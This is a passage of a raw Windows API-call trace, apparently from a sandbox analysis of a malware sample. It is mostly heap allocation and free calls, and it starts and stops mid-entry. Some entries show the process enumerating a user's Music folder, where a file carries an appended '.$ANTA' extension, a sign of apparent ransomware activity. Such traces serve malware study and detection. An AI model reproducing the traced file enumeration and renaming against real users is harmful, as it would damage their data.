RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0114.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0114.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0114.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0114.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0114.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0114.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0114.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0114.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0114.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.853] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0114.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0114.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0114.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.854] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0114.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.854] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0114.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0114.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0114.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0114.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0114.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.854] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0114.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0114.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.855] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9")) returned 0x10 [0114.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0114.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0114.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0114.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.855] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0114.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0114.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3b8 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.856] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0114.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0114.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0114.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0114.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0114.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0114.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.857] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0114.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0114.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0114.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0114.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0114.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0114.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0114.858] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4634ef0, ftCreationTime.dwHighDateTime=0x1d5f0bd, ftLastAccessTime.dwLowDateTime=0x1095b2ce, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1095b2ce, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca268, cFileName=".", cAlternateFileName="")) returned 0x41ac040 [0114.858] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4634ef0, ftCreationTime.dwHighDateTime=0x1d5f0bd, ftLastAccessTime.dwLowDateTime=0x1095b2ce, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1095b2ce, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca268, cFileName="..", cAlternateFileName="")) returned 1 [0114.858] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10409fff, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x10409fff, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x1058782e, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x670, dwReserved0=0x0, dwReserved1=0x43ca268, cFileName="0csxPXrUs0a.m4a.$ANTA", cAlternateFileName="0CSXPX~1.$AN")) returned 1 [0114.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0114.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0114.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0114.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.859] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.859] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0114.859] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0114.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.860] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8cd8 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8cd8 | out: hHeap=0x1780000) returned 1 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.860] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea268 [0114.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0114.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0114.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3b8 [0114.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0114.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0114.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0114.861] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.861] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0114.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0114.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0114.861] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb9012730, 